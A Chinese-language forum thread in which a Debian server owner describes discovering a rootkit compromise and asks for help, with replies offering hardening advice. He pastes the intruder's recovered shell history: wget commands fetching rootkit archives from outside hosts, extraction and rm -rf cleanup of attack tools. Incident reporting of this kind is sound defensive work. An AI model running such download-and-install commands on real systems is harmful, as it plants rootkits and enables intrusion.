今天来公司发现偶无法使用phpMyAdmin进入Mysql进行操作，觉得不对劲，就准备想用rhkhunter检查一下

系统有没有中了root kit，没想到竞然不能运行，我倒！ps -auxf发现几个不正常的进程在跑！

想想可能中扫了！那个小样的已经侵入我的主机了！
顺便说一下，我的系统是Debian 3.0rc1，不过昨天刚使用apt-get upgrade了，不过昨天好像就有发现有

几个不正常的进程在跑！

看一下可能被黑客更换的几个二进制程序/bin/ls /bin/cp等，发现文件大小都变了，同时文件的时间也

变了，晕真的中招了！

我查了/var/log/syslog中的信息，没有找到任何线索！
再看一下我的/root/.bash_history，在里面我到到了几个命令！

wget www.wget.as.ro/kit.tgz
tar zxvf kit.tgz
ls
rm -rf toy toy.tgz voda wpe aa.o cc.o cleaner
ls
cd s
cd sl2y
rm -rf toy toy.tgz voda wpe aa.o cc.o cleaner sl2y sl3y s smurf5 st str.sh
ls
tar zxvf kit.tgz
rm -rf kit.tgz
cd /var/tmp
ls
rm -rf xpl xpl.tgz
wget puidedrac.org/rk.tgz;tar
wget www.wget.as.ro/kit.tgz
tar -zxvf kit.tgz
ls
tar zxvf kit.tgz

KAO，中招了！
我用另一PC下载了这个kit.tgz，解压后看了几个文件，再看了setup的文件，我倒！整个系统被改了乱七

八糟！

我大致了解了，我这台主机被入侵的过程，

1.取得root权限  [但不知他是如何取的，我想可能是我系统中的那个软件有BUG吧，高手请指教！]

2.下载kit.tgz

然后就运行这里面的setup文件，把很多命令程序都给调包了！

3.由于我的主板是动态IP，这个黑客要长期控制我的主机的话，他必须知道我的主机的当前IP的地址，因

此我使用netstat -tal[之前我已经停了所有的服务，ssh除外，偶要登录！]：
发现我的主机总是在连207.66.155.21:80，我想可能，对方肯定在我的机器里下了一个木马，一直连

207.66.155.21主机的HTTP以确定偶的主机的当前IP！

惨！

不知哪位仁兄有被入侵的经验！
我暂不想重装，想查看是如何被入侵的！
同时我想重装ls所属的软件，以及其它均会发生错误！但不知如何解决！请帮助[重装整个系统除外的方

法]现在偶连装软件都有困难！

仁兄们，可能给偶一些相关的入侵的资料，让偶看一下！感激！

如果已经到了你的机器里，取得root很简单。所以要从最根本的途径防止入侵，关闭不需要的服务，尤其是telnet, ssh等，用ipchains限制使用服务的ip, 删除不必要的用户，定期修改所有用户口令，等。。。

你刚刚upgrade说明你的系统已经有问题了吧
你多久没有更新你的系统了？
我以前就是用rh7.3老是被人黑，现在在试用debian
看来要把升级的工作经常做才行

估计你现在已经看不到什么记录了，人家取得了root权限，你肯定什么都查不出来了

关键是怎么取得root的。。。然后要查登录记录才行。